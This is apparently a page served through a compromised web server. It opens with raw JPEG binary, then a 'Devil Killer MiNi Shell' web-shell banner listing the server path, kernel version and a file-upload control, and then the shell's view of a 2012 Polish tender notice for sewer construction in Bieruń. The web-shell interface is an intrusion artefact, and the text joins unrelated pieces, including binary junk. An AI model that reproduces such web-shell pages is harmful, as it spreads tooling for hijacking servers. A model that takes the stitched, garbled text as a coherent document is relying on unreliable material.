JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120725/162105-N-2012.html

<p class="kh_header"><b>Bieruń: Budowa kanalizacji sanitarnej Bierunia - rozbudowa istniejącej sieci - 
Budowa odcinka kanalizacji sanitarnej do budynków przy ul. Warszawskiej nr 222, 224 i 226 w Bieruniu na działkach nr 270/59, 590/58, 458/61 i 589/58, 512/61 i 70</b><br>
<b>Numer ogłoszenia: 162105 - 2012; data zamieszczenia: 25.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej Bierunia - rozbudowa istniejącej sieci - 
Budowa odcinka kanalizacji sanitarnej do budynków przy ul. Warszawskiej nr 222, 224 i 226 w Bieruniu na działkach nr 270/59, 590/58, 458/61 i 589/58, 512/61 i 70.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rozbudowa istniejącej miejskiej sieci kanalizacji sanitarnej 
w rejonie ul. Warszawskiej w Bieruniu Nowym. 
Rozbudowa istniejącej kanalizacji sanitarnej obejmuje budowę odcinka kanalizacji sanitarnej od istniejącej studni kanalizacyjnej do budynków mieszkalnych przy ul. Warszawskiej nr 222, 224 i 226                w Bieruniu  zlokalizowanych na działkach nr 270/59, 590/58, 458/61, 589/58, 512/61 i 70.
Zestawienie długości i głównych materiałów instalacyjnych potrzebnych do zrealizowania zamówienia:
1 - Kolektor grawitacyjny z rur PVC-U klasy S DN 160x4,7 mm (SDR34, SN8) z wydłużonym 
     kielichem, L= 66,00 m, (zgodnie z SST 2),
2 - Kolektor grawitacyjny z rur PVC-U klasy S DN 200x5,9 mm (SDR34, SN8)  z wydłużonym 
     kielichem, L= 100,00 m, (zgodnie z SST 2),
3 - Studnie kanalizacyjne z tworzywa sztucznego DN 425mm - 6 kpl. (zgodnie z SST 2),
4 - Studnie kanalizacyjne z tworzywa sztucznego DN 600mm - 4 kpl. (zgodnie z SST 2),

Zakres zamówienia obejmuje również:
1)	  Wykonanie dokumentacji fotograficznej z datami wykonania zdjęć wszystkich obiektów kubaturowych, ogrodzeń i innych obiektów sąsiadujących z terenem budowy, którą należy wykonać przed przystąpieniem do robót, w trakcie robót (szczególnie elementy ulegające zakryciu) i po zakończeniu prac.
2)	  Zagospodarowanie i ochronę placu budowy, wykonanie zasilania placu budowy w energię elektryczną i wodę;
3)	  Wykonanie planu bezpieczeństwa i ochrony zdrowia (BIOZ) wg wytycznych zawartych                       w projekcie;
4)	  Wykonanie koniecznych wyłączeń sieci energetycznych, wodociągowych , gazowych itp., jeżeli zajdzie taka konieczność;
5)	  Zabezpieczenie dojść i dojazdów do poszczególnych nieruchomości w okresie prowadzenia robót;
6)	  Zabezpieczenie możliwości dojazdu pojazdów uprzywilejowanych ( straż, pogotowie itp.);
7)	 Bieżące utrzymanie oraz czyszczenie dróg , z których będzie korzystał wykonawca w czasie budowy (dojazd);
8)	  Wykonanie badań i sprawdzeń wynikających ze STWiORB, nie ujętych w przedmiarze robót; 
9)	  Obsługę geodezyjną i wznowienie ewentualnie zniszczonych w trakcie robót budowlanych kamieni granicznych;
10)	 Zlecanie  nadzorów specjalistycznych właścicielom lub gestorom urządzeń uzbrojenia terenu,                  w pobliżu których będą prowadzone roboty;
11)	 Przywrócenie terenu zajętego w czasie realizacji zadania do stanu pierwotnego wraz 
  z uzyskaniem na zakończenie prac oświadczenia władających daną posesją o przywróceniu   
  do stanu pierwotnego na posesji; 
12)	Wykonanie dokumentacji powykonawczej i przekazanie jej w 5 egz. Zamawiającemu nie później
         niż w terminie zakończenia przedmiotu umowy; 
13)	 Usuwanie awarii urządzeń powstałych w wyniku prowadzenia robót;
14)	Wykonanie inwentaryzacji geodezyjnej powykonawczej i przekazanie jej w 5 egz. Zamawiającemu 
         nie później niż w terminie zakończenia przedmiotu umowy. 





INFORMACJE  DODATKOWE:
W celu dokonania prawidłowej wyceny zakresu prac, do obowiązków wykonawcy należy dokładna analiza dokumentacji projektowej, rysunków, specyfikacji technicznej wykonania i odbioru robót oraz przedmiarów robót.

Klasyfikacja CPV : 
45111200-0               Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
45110000-1               Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne,
45112000-5               Roboty w zakresie usuwania gleby,
45230000-8               Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych 
                                  i  energetycznych, autostrad, dróg, lotnisk i kolei, wyrównanie terenu,
45232410-9               Roboty w zakresie kanalizacji ściekowej,
45233142-6               Roboty w zakresie naprawy dróg.

Warunki i wymagania:
Jeżeli w specyfikacji technicznej wykonania i odbioru robót  oraz SIWZ  określone zostały materiały            i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w projekcie  i specyfikacji technicznej wykonania i odbioru robót. Podane w opisach nazwy własne nie mają na celu naruszenia art.29 i 7 ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego.
Zamawiający dopuszcza rozwiązania równoważne, pod warunkiem spełnienia tego samego poziomu jakościowego, technologicznego i estetycznego.
Zabudowane i dostarczone materiały budowlane muszą posiadać wszystkie wymagane Prawem budowlanym i polskimi normami, przenoszącymi zharmonizowane normy europejskie, atesty, certyfikaty             i aprobaty techniczne.
W świetle zapisów Prawa zamówień publicznych  (art.30) należy stosować wyroby budowlane spełniające wymagania Polskich Norm przenoszących Normy Europejskie PN-EN (normy zharmonizowane). W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy uwzględnia się w kolejności:
1) europejskie aprobaty techniczne;
2) wspólne specyfikacje techniczne;
3) normy międzynarodowe;
4) inne techniczne systemy odniesienia ustanowione przez europejskie organy normalizacyjne.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy oraz aprobat, specyfikacji, norm i systemów, o których mowa w art. 30 ust. 2  ustawy pzp, uwzględnia się w kolejności:
1) Polskie Normy;
2) polskie aprobaty techniczne;
3) polskie specyfikacje techniczne.
Zgodnie z art. 8 ust. 5  Ustawy o systemie oceny zgodności ( tekst jednolity Dz. U. 2010.138.935) zabrania się wprowadzania do obrotu lub oddawania do użytku wyrobu nieposiadającego oznakowania zgodności, jeżeli wyrób ten podlega takiemu oznakowaniu. 
W związku z powyższym zamawiający będzie wymagał od  wykonawcy stosownego oświadczenia             w stosunku do wyrobów, które podlegają takiemu oznakowaniu. 
W trakcie realizacji inwestycji należy:
Obowiązkiem wykonawcy jest  zapewnienie kadry kierowniczej - kierownika budowy.
Wybrany w przetargu wykonawca przedstawi zamawiającemu w ciągu 14 dni od daty zawarcia umowy:
- szczegółowy harmonogram realizacji robót,
- plan bezpieczeństwa i ochrony zdrowia (BIOZ),
- kopie zgłoszeń nadzorów branżowych,
- świadectwa dopuszczenia do stosowania dla materiałów i wyrobów do zabudowy na  
  zadaniu inwestycyjnym - do akceptacji przez inspektora nadzoru,
- dokumentację fotograficzną wraz z datami wykonania fotografii, wykonaną przed rozpoczęciem
robót.

Zamawiający nie przewiduje: udzielenia zamówień uzupełniających, zaliczek na poczet wykonania
zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów
w rozumieniu ustawy oraz stosowania wymagań określonych w art.29 ust.4 ustawy.
Zamawiający nie dopuszcza składania ofert częściowych , wariantowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.00.00-1, 45.11.20.00-5, 45.23.00.00-8, 45.23.24.10-9, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zasady wnoszenia wadium
Wadium w wysokości  5 000,00 zł ( słownie: pięćtysięcyzłotych 00/100) musi być wniesione                         w terminie, który został podany w punkcie Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego.
w BS O/Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją:
Wadium - nr sprawy: ZP.271.42.2012 Przetarg nieograniczony na wybór wykonawcy zamówienia  pn. Budowa  kanalizacji sanitarnej Bierunia - rozbudowa istniejącej sieci - Budowa odcinka kanalizacji sanitarnej do budynków przy ul. Warszawskiej nr 222,224 i 226 w Bieruniu na działkach nr 270/59, 590/58, 458/61, 589/58, 512/61 i 70
Określenie - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium ,wpłaconego przelewem, na rachunku zamawiającego.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu, nie później niż do godz. 10:00 w dniu otwarcia ofert.
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 poz.1158                 z późniejszymi zmianami).
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz                      z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się                               o udzielenie nin. zamówienia, należy wskazać wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                         z art. 24 ust. 2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.
2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz                      z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1)	Zgodnie z art. 46 ust.1 ustawy pzp, zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
2)	Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3)	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4)	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez zamawiającego.


3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy pzp zamawiający zatrzymuje wadium wraz                                  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                    w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają   
 obowiązek posiadania takich uprawnień.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę: 
- oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Posiadają wiedzę i doświadczenie: 
     Wykonali zgodnie ze sztuką budowlaną i prawidłowo ukończyli w okresie ostatnich pięciu lat przed      
     upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - to w tym 
     okresie - co najmniej jedno zadanie w zakresie budowy kanalizacji o wartości min. 200 000,00 zł brutto.
     Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie   
     przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy pzp),
     - wykazu wykonanych robót  w zakresie budowy kanalizacji, w tym co najmniej jednego zadania 
       o wartości min. 200 000,00 zł, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz  
       załączeniem dokumentów  (np. referencji) potwierdzających, że roboty te zostały wykonane 
       zgodnie z  zasadami sztuki budowlanej i prawidłowo ukończone .
     Przez wykonali należy rozumieć, że roboty  zostały zakończone i odebrane protokołami 	końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania ofert,
     a jeżeli okres jest krótszy - w tym okresie. W przypadku wykonawców wspólnie ubiegających się o    
     udzielenie zamówienia ocena  warunku  nastąpi łącznie tzn. należy wykazać, że warunek wykonania     
     robót o wartości brutto min. 200 000,00 zł spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.
Dysponują co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami w zakresie    
sieci sanitarnych bez ograniczeń, która będzie uczestniczyć w wykonaniu zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
     przedłożonego przez wykonawcę:
-	oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp)
-	wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności                                             odpowiedzialnych za  kierowanie robotami budowlanymi (uprawnienia w zakresie sieci sanitarnych bez ograniczeń), wraz  z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.  
   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  wykazać, 
   że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie          
    przedłożonego przez wykonawcę :
- oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca przystępujący do postępowania złoży oświadczenie z art. 22 ust. 1 ustawy pzp, że :
1.	Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	Posiada wiedzę i doświadczenie do wykonania zamówienia; 
3.	Dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
 Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. 
Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
1.	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt. Lista wymaganych oświadczeń   
       oraz  w pkt. Lista wymaganych dokumentów.
       Zamiast dokumentu, o którym mowa w punkcie  3 Listy wymaganych dokumentów  
       przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
       potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed 
upływem terminu składania ofert.
       Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go
       dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem    
       sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
       odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania.
       Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa w pkt 1
        niniejszej uwagi.
    2.   Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
  3.   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku                                 
        podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących  
        odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez  
        wykonawcę lub te podmioty.
  4.   Wykonawca  może  polegać  na  wiedzy  i  doświadczeniu ,  potencjale  technicznym ,  osobach        
        zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie    
